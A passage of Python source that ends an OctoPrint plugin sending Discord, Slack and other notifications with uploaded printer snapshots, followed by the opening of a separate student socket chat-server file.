title=None, description="\n" + text, color=discord_color
)
if hosted_url and len(hosted_url) > 0:
if snapshot_upload_method == "DISCORD":
self._logger.debug(
"Discord snapshot image to attach: "
+ str(hosted_url)
)
snapshot_filename = hosted_url[
hosted_url.rfind("/") + 1 :
]
with open(hosted_url, "rb") as f:
discord.add_file(
file=f.read(), filename=snapshot_filename
)
else:
embed.set_image(url=hosted_url)
if (
event == "MovieDone"
and "movie" in event_payload
and snapshot_upload_method == "DISCORD"
):
timelapse_movie = event_payload["movie"]
self._logger.debug(
"Discord timelapse movie to attach: "
+ str(timelapse_movie)
)
movie_filename = timelapse_movie[
timelapse_movie.rfind("/") + 1 :
]
with open(timelapse_movie, "rb") as f:
discord.add_file(file=f.read(), filename=movie_filename)
if not footer == None and len(footer) > 0:
embed.set_footer(text=footer)
discord.add_embed(embed)
self._logger.debug(
"Discord WebHook message json: " + json.dumps(discord.json)
)
discordRsp = discord.execute()
self._logger.debug(
"Discord WebHook execute response: "
+ "\n Status Code: "
+ str(discordRsp.status_code)
+ "\n Headers: \n"
+ str(discordRsp.headers)
+ "\n Content: \n"
+ str(discordRsp.content)
)
except Exception as e:
self._logger.exception(
"Discord WebHook message send error: " + str(e)
)
except Exception as e:
self._logger.exception("Send message error: " + str(e))
tmp_imgur_client = None
def upload_snapshot(self):
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
self._logger.debug(
"Upload snapshot - snapshot_upload_method: " + snapshot_upload_method
)
if snapshot_upload_method == None or snapshot_upload_method == "NONE":
return None, None, None
connection_method = self.connection_method()
local_file_path, error_msgs = self.retrieve_snapshot_images()
if local_file_path == None:
return None, error_msgs, None
dest_filename = local_file_path[local_file_path.rfind("/") + 1 :]
self._logger.debug(
"Upload snapshot - connection_method: "
+ str(connection_method)
+ ", snapshot_upload_method: "
+ snapshot_upload_method
)
# Return the file object, later logic will actually upload the asset
if (
(connection_method == "APITOKEN" and snapshot_upload_method == "SLACK")
or (
connection_method == "PUSHOVER" and snapshot_upload_method == "PUSHOVER"
)
or (
connection_method == "ROCKETCHAT"
and snapshot_upload_method == "ROCKETCHAT"
)
or (connection_method == "DISCORD" and snapshot_upload_method == "DISCORD")
):
return local_file_path, error_msgs, None
return self.upload_asset(local_file_path, dest_filename, None, error_msgs)
def upload_timelapse_movie(self, local_file_path, channels):
try:
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
if snapshot_upload_method == None or snapshot_upload_method == "NONE":
return None, None
if (
snapshot_upload_method == "PUSHOVER"
or snapshot_upload_method == "ROCKETCHAT"
or snapshot_upload_method == "MATRIX"
or snapshot_upload_method == "DISCORD"
):
return None, None
error_msgs = []
if snapshot_upload_method == "IMGUR":
# Imgur does not currently support video uploads
self._logger.exception(
"Timelapse upload error: Imgur does not currently support video uploads"
)
error_msgs.append("Imgur does not currently support video uploads")
return None, error_msgs
wait_start = time.time()
while not os.path.exists(local_file_path):
if time.time() - wait_start > 15:
self._logger.exception(
"Timelapse upload error: Unable to locate timelapse on disk"
)
error_msgs.append("Unable to locate timelapse on disk")
return None, error_msgs
time.sleep(5)
file_path, file_name = os.path.split(local_file_path)
dest_filename = file_name
url, error_msgs, slack_rsp = self.upload_asset(
local_file_path, dest_filename, channels, error_msgs
)
self._logger.debug(
"Upload timelapse ret: URL: "
+ str(url)
+ ", ErrorMsgs: "
+ str(error_msgs)
)
return url, error_msgs
except Exception as e:
self._logger.exception("Snapshot upload error: " + str(e))
error_msgs.append(str(e))
return None, error_msgs
##Channels is only required/used for Slack uploads
def upload_asset(self, local_file_path, dest_filename, channels, error_msgs):
snapshot_upload_method = self._settings.get(
["snapshot_upload_method"], merged=True
)
if snapshot_upload_method == None or snapshot_upload_method == "NONE":
return None, error_msgs, None
connection_method = self.connection_method()
if error_msgs == None:
error_msgs = []
self._logger.debug(
"Upload asset - Snapshot upload method: "
+ snapshot_upload_method
+ ", Local file path: "
+ str(local_file_path)
+ ", Destination filename: "
+ str(dest_filename)
)
if local_file_path:
try:
if snapshot_upload_method == "S3":
try:
self._logger.debug("Uploading snapshot via S3")
s3_upload_start = time.time()
s3_config = self._settings.get(["s3_config"], merged=True)
awsAccessKey = s3_config["AWSAccessKey"]
awsSecretKey = s3_config["AWSsecretKey"]
s3Bucket = s3_config["s3Bucket"]
fileExpireDays = int(s3_config["file_expire_days"])
s3URLStyle = s3_config["URLStyle"]
s3_expiration = timedelta(days=fileExpireDays)
imgData = open(local_file_path, "rb")
uploadFilename = dest_filename
s3conn = tinys3.Connection(awsAccessKey, awsSecretKey, tls=True)
s3UploadRsp = s3conn.upload(
uploadFilename,
imgData,
s3Bucket,
headers={"x-amz-acl": "public-read"},
expires=s3_expiration,
)
self._logger.debug("S3 upload response: " + str(s3UploadRsp))
s3_upload_elapsed = time.time() - s3_upload_start
self._logger.debug(
"Uploaded asset to S3 in "
+ str(round(s3_upload_elapsed, 2))
+ " seconds"
)
if s3URLStyle and s3URLStyle == "VIRTUAL":
return (
"https://"
+ s3Bucket
+ ".s3.amazonaws.com/"
+ uploadFilename,
error_msgs,
None,
)
else:
return (
"https://s3.amazonaws.com/"
+ s3Bucket
+ "/"
+ uploadFilename,
error_msgs,
None,
)
except Exception as e:
self._logger.exception(
"Failed to upload asset to S3: " + str(e)
)
error_msgs.append("S3 error: " + str(e))
elif snapshot_upload_method == "MINIO":
try:
self._logger.debug("Uploading asset via Minio")
minio_upload_start = time.time()
minio_config = self._settings.get(["minio_config"], merged=True)
minioAccessKey = minio_config["AccessKey"]
minioSecretKey = minio_config["SecretKey"]
minioBucket = minio_config["Bucket"]
if minio_config["secure"]:
minioURI = "https://{endpoint}/{bucket}/".format(
endpoint=minio_config["Endpoint"], bucket=minioBucket
)
else:
minioURI = "http://{endpoint}/{bucket}/".format(
endpoint=minio_config["Endpoint"], bucket=minioBucket
)
uploadFilename = dest_filename
minioClient = Minio(
minio_config["Endpoint"],
access_key=minioAccessKey,
secret_key=minioSecretKey,
secure=minio_config["secure"],
)
minioUploadRsp = minioClient.fput_object(
minioBucket, uploadFilename, local_file_path
)
self._logger.debug(
"Minio upload response: " + str(minioUploadRsp)
)
minio_upload_elapsed = time.time() - minio_upload_start
self._logger.debug(
"Uploaded asset to Minio in "
+ str(round(minio_upload_elapsed, 2))
+ " seconds"
)
return minioURI + uploadFilename, error_msgs, None
except Exception as e:
self._logger.exception(
"Failed to upload asset to Minio: " + str(e)
)
error_msgs.append("Minio error: " + str(e))
elif snapshot_upload_method == "IMGUR":
try:
self._logger.debug("Uploading asset via Imgur")
imgur_upload_start = time.time()
imgur_config = self._settings.get(["imgur_config"], merged=True)
imgur_client_id = imgur_config["client_id"]
imgur_client_secret = imgur_config["client_secret"]
imgur_client_refresh_token = imgur_config["refresh_token"]
imgur_album_id = imgur_config["album_id"]
if (
imgur_client_refresh_token == None
or len(imgur_client_refresh_token.strip()) == 0
):
imgur_client_refresh_token = None
else:
imgur_client_refresh_token = (
imgur_client_refresh_token.strip()
)
if imgur_album_id == None or len(imgur_album_id.strip()) == 0:
imgur_album_id = None
else:
imgur_album_id = imgur_album_id.strip()
if (
imgur_client_refresh_token == None
or len(imgur_client_refresh_token) == 0
) and (imgur_album_id and len(imgur_album_id) > 0):
self._logger.error(
"Usage of an Imgur Album ID requires a valid Refresh Token"
)
error_msgs.append(
"Imgur error: Use of an Album ID requires a valid Refresh Token"
)
return None, error_msgs, None
imgur_client = ImgurClient(
imgur_client_id,
imgur_client_secret,
None,
imgur_client_refresh_token,
)
self.tmp_imgur_client = imgur_client
imgur_upload_config = {}
if not imgur_album_id == None:
imgur_upload_config["album"] = imgur_album_id
imgur_upload_config["title"] = dest_filename
##imgur_upload_config['title'] = 'ImageTitle123'
##imgur_upload_config['description'] = 'ImageDescription123'
self._logger.debug(
"Uploading to Imgur - Config: "
+ str(imgur_upload_config)
+ ", File path: "
+ local_file_path
+ ", File exists: "
+ str(os.path.isfile(local_file_path))
)
##Required to work around Imgur servers not always properly returning a 403
if imgur_client.auth:
self._logger.debug("Executing manual Imgur auth refresh")
imgur_client.auth.refresh()
imgurUploadRsp = imgur_client.upload_from_path(
local_file_path, config=imgur_upload_config, anon=False
)
self._logger.debug(
"Imgur upload response: " + str(imgurUploadRsp)
)
imgur_upload_elapsed = time.time() - imgur_upload_start
self._logger.debug(
"Uploaded asset to Imgur in "
+ str(round(imgur_upload_elapsed, 2))
+ " seconds"
)
imgurUrl = imgurUploadRsp["link"]
return imgurUrl, error_msgs, None
except ImgurClientError as ie:
self._logger.exception(
"Failed to upload snapshot to Imgur (ImgurClientError): "
+ str(ie.error_message)
+ ", StatusCode: "
+ str(ie.status_code)
)
if not self.tmp_imgur_client == None:
self._logger.exception(
"ImgurClient Credits: "
+ str(self.tmp_imgur_client.credits)
)
error_msgs.append("Imgur error: " + str(ie.error_message))
error_msgs.append(
"Imgur credits: " + str(self.tmp_imgur_client.credits)
)
except ImgurClientRateLimitError as rle:
self._logger.exception(
"Failed to upload snapshot to Imgur (ImgurClientRateLimitError): "
+ str(rle)
)
if not self.tmp_imgur_client == None:
self._logger.exception(
"ImgurClient Credits: "
+ str(self.tmp_imgur_client.credits)
)
error_msgs.append("Imgur error: " + str(rle))
error_msgs.append(
"Imgur credits: " + str(self.tmp_imgur_client.credits)
)
except Exception as e:
self._logger.exception(
"Failed to upload snapshot to Imgur (Exception): " + str(e)
)
error_msgs.append("Imgur error: " + str(e))
elif (
connection_method == "SLACKPI" and snapshot_upload_method == "SLACK"
):
return self.upload_slack_asset(
local_file_path,
dest_filename,
dest_filename,
channels,
error_msgs,
)
elif (
connection_method == "PUSHBULLET"
and snapshot_upload_method == "PUSHBULLET"
):
try:
self._logger.debug("Uploading asset via Pushbullet")
pushbullet_upload_start = time.time()
pushbulletAccessToken = self._settings.get(
["pushbullet_config"], merged=True
).get("access_token")
pb_rsp = None
if not pushbulletAccessToken == None:
pushbulletAccessToken = pushbulletAccessToken.strip()
if (
pushbulletAccessToken == None
or len(pushbulletAccessToken) == 0
):
self._logger.error(
"Pushbullet connection not available, skipping asset upload"
)
else:
with open(local_file_path, "rb") as img_file:
try:
pb = Pushbullet(pushbulletAccessToken)
pb_rsp = pb.upload_file(img_file, dest_filename)
self._logger.debug(
"Pushbullet asset upload response: "
+ str(pb_rsp)
)
pushbullet_upload_elapsed = (
time.time() - pushbullet_upload_start
)
self._logger.debug(
"Uploaded asset to Pushbullet in "
+ str(round(pushbullet_upload_elapsed, 2))
+ " seconds"
)
except Exception as e:
self._logger.exception(
"Error while uploading snapshot to Pushbullet, sending only a note: {}".format(
str(e)
)
)
error_msgs.append("Pushbullet error: " + str(e))
if pb_rsp and "file_url" in pb_rsp:
return pb_rsp["file_url"], error_msgs, None
except Exception as e:
self._logger.exception(
"Failed to upload asset to Pushbullet: " + str(e)
)
error_msgs.append("Pushbullet error: " + str(e))
elif (
connection_method == "MATRIX" and snapshot_upload_method == "MATRIX"
):
try:
self._logger.debug("Uploading asset via Matrix")
matrix_upload_start = time.time()
matrixServerURL = self._settings.get(
["matrix_config"], merged=True
).get("server_url")
matrixAccessToken = self._settings.get(
["matrix_config"], merged=True
).get("access_token")
matrixUserID = self._settings.get(
["matrix_config"], merged=True
).get("user_id")
if not matrixServerURL == None:
matrixServerURL = matrixServerURL.strip()
if not matrixAccessToken == None:
matrixAccessToken = matrixAccessToken.strip()
if not matrixUserID == None:
matrixUserID = matrixUserID.strip()
matrix_rsp = None
if (
matrixServerURL == None
or len(matrixServerURL) == 0
or matrixAccessToken == None
or len(matrixAccessToken) == 0
or matrixUserID == None
or len(matrixUserID) == 0
):
self._logger.error(
"Matrix connection not available, skipping asset upload"
)
else:
matrix = MatrixClient(
base_url=matrixServerURL,
token=matrixAccessToken,
user_id=matrixUserID,
)
self._logger.debug(
"Matrix authenticated user_id: " + str(matrix.user_id)
)
with open(local_file_path, "rb") as img_file:
try:
img_bytes = img_file.read()
matrix_rsp = matrix.upload(
content=img_bytes, content_type="image/png"
)
self._logger.debug(
"Matrix upload response: "
+ json.dumps(matrix_rsp)
)
matrix_upload_elapsed = (
time.time() - matrix_upload_start
)
self._logger.debug(
"Uploaded asset to Matrix in "
+ str(round(matrix_upload_elapsed, 2))
+ " seconds"
)
return matrix_rsp, error_msgs, None
except Exception as e:
self._logger.exception(
"Error while uploading snapshot to Matrix, sending only a note: {}".format(
str(e)
)
)
error_msgs.append("Matrix error: " + str(e))
except Exception as e:
self._logger.exception(
"Failed to upload asset to Matrix: " + str(e)
)
error_msgs.append("Matrix error: " + str(e))
except Exception as e:
self._logger.exception("Asset upload error: %s" % str(e))
error_msgs.append(str(e.message))
finally:
if local_file_path:
self._logger.debug(
"Deleting local asset after upload: " + str(local_file_path)
)
os.remove(local_file_path)
self.tmp_imgur_client = None
return None, error_msgs, None
def upload_slack_asset(
self, local_file_path, dest_filename, file_description, channels, error_msgs
):
if error_msgs == None:
error_msgs = []
connection_method = self.connection_method()
if connection_method == None or connection_method != "APITOKEN":
self._logger.error("Slack API connection required for Slack asset uploads")
error_msgs.append("Slack API connection required for Slack asset uploads")
return None, error_msgs, None
self._logger.debug("Uploading asset via Slack")
if channels == None or len(channels) == 0:
self._logger.exception("Slack asset upload failed. Channels list was empty")
error_msgs.append("Slack channels list was empty")
return None, error_msgs, None
slack_upload_start = time.time()
slackAPIConnection = None
slackAPIToken = self._settings.get(["slack_apitoken_config"], merged=True).get(
"api_token"
)
if not slackAPIToken == None:
slackAPIToken = slackAPIToken.strip()
if slackAPIToken and len(slackAPIToken) > 0:
slackAPIConnection = Slacker(slackAPIToken, timeout=SLACKER_TIMEOUT)
if slackAPIConnection == None:
self._logger.exception("Slack API connection unavailable")
error_msgs.append("Slack API connection unavailable")
return None, error_msgs, None
asset_msg = {
"file_": local_file_path,
"filename": dest_filename,
"title": file_description,
"channels": channels,
}
self._logger.debug("Uploading file to Slack: " + str(asset_msg))
resp = slackAPIConnection.files.upload(**asset_msg)
self._logger.debug("Slack API upload snapshot response: " + resp.raw)
error_msg = None
if resp == None:
error_msg = "Unknown"
elif not resp.successful:
error_msg = resp.error
if not error_msg == None:
self._logger.exception(
"Slack asset upload failed. Error: " + str(error_msg)
)
error_msgs.append(str(error_msg))
return None, error_msgs, None
slack_upload_elapsed = time.time() - slack_upload_start
self._logger.debug(
"Uploaded asset to Slack in "
+ str(round(slack_upload_elapsed, 2))
+ " seconds"
)
download_url = resp.body.get("file").get("url_private_download")
return download_url, error_msgs, resp
def retrieve_snapshot_images(self):
urls = []
localCamera = self._settings.global_get(["webcam", "snapshot"])
localCameraFlipH = self._settings.global_get(["webcam", "flipH"])
localCameraFlipV = self._settings.global_get(["webcam", "flipV"])
localCameraRotate90 = self._settings.global_get(["webcam", "rotate90"])
self._logger.debug(
"Local camera settings - Snapshot URL:"
+ str(localCamera)
+ ", FlipH: "
+ str(localCameraFlipH)
+ ", FlipV: "
+ str(localCameraFlipV)
+ ", Rotate90: "
+ str(localCameraRotate90)
)
if not localCamera == None:
urls.append(
(localCamera, localCameraFlipH, localCameraFlipV, localCameraRotate90)
)
additional_snapshot_urls = self._settings.get(
["additional_snapshot_urls"], merged=True
)
if not additional_snapshot_urls == None:
for entry in additional_snapshot_urls.split(","):
entry = entry.strip()
if len(entry) == 0:
continue
entry = urllib2.unquote(entry)
parts = entry.split("|")
url = parts[0].strip()
flipH = False
flipV = False
rotate90 = False
if len(parts) == 4:
flipH = parts[1].strip() == "true"
flipV = parts[2].strip() == "true"
rotate90 = parts[3].strip() == "true"
if len(url) > 0:
urls.append((url, flipH, flipV, rotate90))
self._logger.debug("Snapshot URLs: " + str(urls))
threads = []
thread_responses = []
downloaded_images = []
error_msgs = []
download_start = time.time()
idx = 0
for url_data in urls:
url, flip_h, flip_v, rotate_90 = url_data
thread_responses.append((None, None))
t = threading.Thread(
target=self.download_image,
args=(url, flip_h, flip_v, rotate_90, idx, thread_responses),
)
t.setDaemon(True)
threads.append(t)
t.start()
idx += 1
for t in threads:
t.join()
download_elapsed = time.time() - download_start
self._logger.debug(
"Downloaded all "
+ str(len(urls))
+ " snapshots in "
+ str(round(download_elapsed, 2))
+ " seconds"
)
self._logger.debug("download_image thread_responses: " + str(thread_responses))
for (downloaded_image, error_msg) in thread_responses:
if downloaded_image == None and error_msg == None:
continue
if not downloaded_image == None:
downloaded_images.append(downloaded_image)
if not error_msg == None:
error_msgs.append(error_msg)
## The single returned image will be deleted by the caller
if len(downloaded_images) == 0:
return None, error_msgs
if len(downloaded_images) > 1:
## downloaded_images will be deleted internally by combine_images
combined_image, error_msg = self.combine_images(downloaded_images)
if not error_msg == None:
error_msgs.append(error_msg)
return combined_image, error_msgs
else:
return downloaded_images[0], error_msgs
def generate_snapshot_filename(self):
return "Snapshot_" + str(uuid.uuid1()).replace("-", "") + ".png"
def rename_snapshot_filename(self, tmp_filename):
try:
self._logger.debug(
"Rename tmp file - Existing tmp filename: " + str(tmp_filename)
)
new_filename = (
tmp_filename[: tmp_filename.rfind("/")]
+ "/"
+ self.generate_snapshot_filename()
)
self._logger.debug(
"Rename tmp file - New tmp filename: " + str(new_filename)
)
os.rename(tmp_filename, new_filename)
return new_filename
except Exception as e:
self._logger.exception("Error renaming tmp filename: " + str(e))
return tmp_filename
def download_image(self, url, flip_h, flip_v, rotate_90, rsp_idx, responses):
imgData = None
temp_fd = None
temp_filename = None
try:
download_start = time.time()
basic_auth_user = None
basic_auth_pwd = None
##If basic auth credentials were passed in via protocol://user:pwd@host:port/path, parse them out
if "@" in url:
first_split = url.split("@")
host_port_path = first_split[1]
second_split = first_split[0].split("//")
new_url = second_split[0] + "//" + first_split[1]
auth_split = second_split[1].split(":")
if len(auth_split) > 0:
basic_auth_user = auth_split[0]
if len(auth_split) > 1:
basic_auth_pwd = auth_split[1]
else:
basic_auth_pwd = ""
## We have credentials
if not basic_auth_user == None:
url = new_url
imgReq = urllib2.Request(url)
if not basic_auth_user == None and not basic_auth_pwd == None:
auth_header = base64.b64encode(
"%s:%s" % (basic_auth_user, basic_auth_pwd)
)
imgReq.add_header("Authorization", "Basic %s" % auth_header)
imgRsp = urllib2.urlopen(imgReq, timeout=2)
temp_fd, temp_filename = mkstemp()
os.close(temp_fd)
temp_filename = self.rename_snapshot_filename(temp_filename)
self._logger.debug("Snapshot download temp filename: " + str(temp_filename))
temp_file = open(temp_filename, "wb")
temp_file.write(imgRsp.read())
imgByteCount = temp_file.tell()
temp_file.close()
download_elapsed = time.time() - download_start
self._logger.debug(
"Downloaded snapshot from URL: "
+ url
+ " ("
+ octoprint.util.get_formatted_size(imgByteCount)
+ ") in "
+ str(round(download_elapsed, 2))
+ " seconds to "
+ temp_filename
)
self._logger.debug(
"Transpose operations for URL: "
+ url
+ " - FlipH: "
+ str(flip_h)
+ ", FlipV: "
+ str(flip_v)
+ ", Rotate90: "
+ str(rotate_90)
)
if flip_h or flip_v or rotate_90:
self._logger.debug("Opening file to transpose image for URL: " + url)
tmp_img = Image.open(temp_filename)
if flip_h:
self._logger.debug("Flipping image horizontally for URL: " + url)
tmp_img = tmp_img.transpose(Image.FLIP_LEFT_RIGHT)
self._logger.debug("Horizontally flip complete for URL: " + url)
if flip_v:
self._logger.debug("Flipping image vertically for URL: " + url)
tmp_img = tmp_img.transpose(Image.FLIP_TOP_BOTTOM)
self._logger.debug("Vertical flip complete for URL: " + url)
if rotate_90:
self._logger.debug("Rotating image 90 degrees for URL: " + url)
tmp_img = tmp_img.transpose(Image.ROTATE_90)
self._logger.debug("90 degree rotate complete for URL: " + url)
self._logger.debug(
"Saving transposed image for URL: " + url + " to " + temp_filename
)
if tmp_img.mode in ("RGBA", "LA"):
self._logger.debug(
"Converting transposed image to RGB from: " + str(tmp_img.mode)
)
rgb_img = Image.new("RGB", tmp_img.size, (0, 0, 0))
rgb_img.paste(tmp_img, mask=tmp_img.split()[3])
tmp_img = rgb_img
tmp_img.save(temp_filename, "JPEG")
responses[rsp_idx] = (temp_filename, None)
except Exception as e:
self._logger.exception(
"Error downloading snapshot - URL: " + url + ", Error: " + str(e)
)
responses[rsp_idx] = (None, str(e))
finally:
if not imgData == None:
imgData.close()
def combine_images(self, local_paths):
temp_fd = None
temp_filename = None
try:
generate_image_start = time.time()
images = []
for local_path in local_paths:
try:
img = Image.open(local_path)
images.append(img)
except Exception as e:
self._logger.exception("Error opening downloaded image: " + str(e))
image_count = len(images)
if images == 0:
return None, None
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_width = max(widths)
total_height = sum(heights)
max_height = max(heights)
grid_size = 0, 0
grid_rows = None
grid_row_images = []
grid_row_heights = []
grid_col_widths = []
arrangement = self._settings.get(["snapshot_arrangement"], merged=True)
if arrangement == None:
arrangement = "HORIZONTAL"
##Lazy grid layout (no formula) supports up to 12 images
if arrangement == "GRID" and image_count > 12:
arrangement = "HORIZONTAL"
if arrangement == "VERTICAL":
grid_size = image_count, 1
elif arrangement == "HORIZONTAL":
grid_size = 1, image_count
elif arrangement == "GRID":
##The grid code is a mess but it was a quick and dirt solution we can rewrite later
if image_count == 1:
grid_size = 1, 1
elif image_count == 2:
grid_size = 2, 1
elif image_count == 3:
grid_size = 2, 2
elif image_count == 4:
grid_size = 2, 2
elif image_count == 5:
grid_size = 3, 2
elif image_count == 6:
grid_size = 3, 2
elif image_count == 7:
grid_size = 3, 3
elif image_count == 8:
grid_size = 3, 3
elif image_count == 9:
grid_size = 3, 3
elif image_count == 10:
grid_size = 4, 3
elif image_count == 11:
grid_size = 4, 3
elif image_count == 12:
grid_size = 4, 3
else:
return None, None
row_count, col_count = grid_size
row_idx = 0
col_idx = 0
for img in images:
if len(grid_row_images) <= row_idx:
grid_row_images.append([])
if len(grid_row_heights) <= row_idx:
grid_row_heights.append([])
if len(grid_col_widths) <= col_idx:
grid_col_widths.append([])
width, height = img.size
grid_row_images[row_idx].append(img)
grid_row_heights[row_idx].append(height)
grid_col_widths[col_idx].append(width)
col_idx += 1
if col_idx == col_count:
col_idx = 0
row_idx += 1
newHeight = 0
newWidth = 0
for row in grid_row_heights:
newHeight += max(row)
for row in grid_col_widths:
newWidth += max(row)
##Now that we have the exact height/width, add some spacing around/between the images
image_spacer = 10
newWidth += image_spacer * 2 ## outer borders
newHeight += image_spacer * 2 ## outer borders
newWidth += (col_count - 1) * image_spacer ##horizontal spacers
newHeight += (row_count - 1) * image_spacer ##vertical spacers
new_im = Image.new("RGB", (newWidth, newHeight))
x_offset = image_spacer
y_offset = image_spacer
if arrangement == "VERTICAL" or arrangement == "HORIZONTAL":
for im in images:
if arrangement == "VERTICAL":
x_adjust = image_spacer
if im.size[0] != max_width:
x_adjust = (max_width - im.size[0]) / 2
new_im.paste(im, (x_adjust, y_offset))
y_offset += im.size[1]
y_offset += image_spacer
elif arrangement == "HORIZONTAL":
y_adjust = image_spacer
if im.size[1] != max_height:
y_adjust = (max_height - im.size[1]) / 2
new_im.paste(im, (x_offset, y_adjust))
x_offset += im.size[0]
x_offset += image_spacer
elif arrangement == "GRID":
row_idx = 0
col_idx = 0
for im in images:
width, height = im.size
row_height = max(grid_row_heights[row_idx])
col_width = max(grid_col_widths[col_idx])
x_adjust = 0
if width < col_width:
x_adjust = (col_width - width) / 2
y_adjust = 0
if height < row_height:
y_adjust = (row_height - height) / 2
new_im.paste(im, (x_offset + x_adjust, y_offset + y_adjust))
col_idx += 1
x_offset += col_width
x_offset += image_spacer
if col_idx == col_count:
y_offset += row_height
y_offset += image_spacer
x_offset = image_spacer
col_idx = 0
row_idx += 1
temp_fd, temp_filename = mkstemp()
os.close(temp_fd)
temp_filename = self.rename_snapshot_filename(temp_filename)
self._logger.debug("Combine image temp filename: " + str(temp_filename))
new_im.save(temp_filename, "JPEG")
statinfo = os.stat(temp_filename)
new_img_size = statinfo.st_size
generate_image_elapsed = time.time() - generate_image_start
self._logger.debug(
"Generated combined image ("
+ octoprint.util.get_formatted_size(new_img_size)
+ ") in "
+ str(round(generate_image_elapsed, 2))
+ " seconds"
)
for im in images:
im.close()
for tmpFile in local_paths:
os.remove(tmpFile)
return temp_filename, None
except Exception as e:
self._logger.exception(
"Error generating combined snapshot image: %s" % (str(e))
)
return None, str(e.message)
active_gcode_events = []
active_gcode_received_events = []
active_gcode_event_regexes = dict()
def update_gcode_sent_listeners(self):
try:
self._logger.debug("Updating G-code listeners")
events_str = self._settings.get(["gcode_events"], merged=True)
new_gcode_events = []
new_gcode_received_events = []
new_gcode_event_regexes = dict()
if events_str == None or len(events_str.strip()) == 0:
tmp_gcode_events = []
else:
tmp_gcode_events = json.loads(events_str)
for gcode_event in tmp_gcode_events:
if (
gcode_event["Enabled"] == False
and gcode_event["CommandEnabled"] == False
) or len(gcode_event["Gcode"].strip()) == 0:
continue
if (
"GcodeMatchType" in gcode_event
and gcode_event["GcodeMatchType"] == "Regex"
):
internalName = gcode_event["InternalName"]
regex_text = gcode_event["Gcode"]
if len(regex_text.strip()) == 0:
continue
try:
compiled_regex = re.compile(regex_text)
new_gcode_event_regexes[internalName] = compiled_regex
except Exception as e:
self._logger.exception(
"Failed to compile G-code match regular expression: "
+ regex_text
+ ", Error: "
+ str(e)
)
if not "GcodeType" in gcode_event or gcode_event["GcodeType"] == "sent":
new_gcode_events.append(gcode_event)
else:
new_gcode_received_events.append(gcode_event)
self.active_gcode_events = new_gcode_events
self.active_gcode_received_events = new_gcode_received_events
self.active_gcode_event_regexes = new_gcode_event_regexes
self._logger.debug(
"Active G-code sent events: " + json.dumps(self.active_gcode_events)
)
self._logger.debug(
"Active G-code received events: "
+ json.dumps(self.active_gcode_received_events)
)
except Exception as e:
self._logger.exception("Error loading gcode listener events: %s" % (str(e)))
def sending_gcode(
self, comm_instance, phase, cmd, cmd_type, gcode, *args, **kwargs
):
if (
not gcode
or self.active_gcode_events == None
or len(self.active_gcode_events) == 0
):
return (cmd,)
try:
for gcode_event in self.active_gcode_events:
trigger_gcode = gcode_event["Gcode"]
if "GcodeMatchType" in gcode_event:
match_type = gcode_event["GcodeMatchType"]
else:
match_type = None
if self.evaluate_gcode_trigger(
cmd, gcode_event, match_type, trigger_gcode
):
notification_enabled = gcode_event["Enabled"]
command_enabled = gcode_event["CommandEnabled"]
self._logger.debug(
"Caught sent G-code: "
+ self.remove_non_ascii(cmd)
+ ", NotificationEnabled: "
+ str(notification_enabled)
+ ", CommandEnabled: "
+ str(command_enabled)
)
self.handle_event(
"GcodeEvent", None, {"cmd": cmd}, False, False, gcode_event
)
except Exception as e:
self._logger.exception(
"Error attempting to match sent G-code command to the configured events, G-code: "
+ gcode
+ ", Error: "
+ str(e.message)
)
return (cmd,)
def received_gcode(self, comm_instance, line, *args, **kwargs):
if (
not line
or self.active_gcode_received_events == None
or len(self.active_gcode_received_events) == 0
):
return line
try:
for gcode_event in self.active_gcode_received_events:
trigger_gcode = gcode_event["Gcode"]
if "GcodeMatchType" in gcode_event:
match_type = gcode_event["GcodeMatchType"]
else:
match_type = None
if self.evaluate_gcode_trigger(
line, gcode_event, match_type, trigger_gcode
):
notification_enabled = gcode_event["Enabled"]
command_enabled = gcode_event["CommandEnabled"]
self._logger.debug(
"Caught received G-code: "
+ self.remove_non_ascii(line)
+ ", NotificationEnabled: "
+ str(notification_enabled)
+ ", CommandEnabled: "
+ str(command_enabled)
)
self.handle_event(
"GcodeEvent",
None,
{"cmd": line},
notification_enabled,
command_enabled,
gcode_event,
)
except Exception as e:
self._logger.exception(
"Error attempting to match received G-code command to the configured events, G-code: "
+ line
+ ", Error: "
+ str(e.message)
)
return line
def evaluate_gcode_trigger(
self, input_gcode, gcode_event, match_type, trigger_gcode
):
if input_gcode == None or trigger_gcode == None:
return False
if match_type == None or len(match_type) == 0:
match_type = "StartsWith"
input_gcode = input_gcode.strip()
trigger_gcode = trigger_gcode.strip()
if len(input_gcode) == 0 or len(trigger_gcode) == 0:
return False
if match_type == "StartsWith":
return input_gcode.startswith(trigger_gcode)
elif match_type == "EndsWith":
return input_gcode.endswith(trigger_gcode)
elif match_type == "Contains":
return trigger_gcode in input_gcode
elif match_type == "Regex":
internalName = gcode_event["InternalName"]
if not internalName in self.active_gcode_event_regexes:
return False
gcode_match_regex = self.active_gcode_event_regexes[internalName]
matches = gcode_match_regex.search(input_gcode)
if matches:
return True
return False
return False
non_ascii_regex = re.compile(r"[^\x00-\x7F]")
def remove_non_ascii(self, input):
return self.non_ascii_regex.sub(" ", input)
def __plugin_load__():
global __plugin_implementation__
__plugin_implementation__ = OctoslackPlugin()
global __plugin_hooks__
__plugin_hooks__ = {
"octoprint.plugin.softwareupdate.check_config": __plugin_implementation__.get_update_information,
"octoprint.comm.protocol.gcode.sending": __plugin_implementation__.sending_gcode,
"octoprint.comm.protocol.gcode.received": __plugin_implementation__.received_gcode,
}
|
Server.py
|
'''
Melissa Hollingshed
14198590
Server.py
'''
import socket
import signal
import os
import threading
import time
import sys
from multiprocessing import Lock
RECV_SIZE = 1024
TIMEOUT = 45
LOCKOUT = 60
PORT = 18590
HOST = ''
user_list = []
lock = Lock()
user_lock = 0
# class for users on the client side
class User:
'Common class for all users in this chat program'
def __init__(self, username, password):
self.username = username
self.password = password
self.active = False
self.logged_in = False
self.port = 18590
self.ip = ''
self.mailbox = []
self.blocked_me = {}
self.private_peer = ''
self.locked_out = False
def __str__(self):
return self.username
# find in user by username
def find_user(username):
global user_list
for u in user_list:
if u.username == username:
return u
return None
# multithread safe addition of user
def thread_add_user(user):
global lock
lock.acquire()
try:
user.logged_in = True
finally:
lock.release()
# multithread safe removal of user
def thread_remove_user(user):
global lock
lock.acquire()
try:
user.logged_in = False
user.port = 18590
finally:
lock.release()
# multithread safe heartbeat function
def thread_update_live_user(user):
global lock
lock.acquire()
try:
user.active = True
finally:
lock.release()
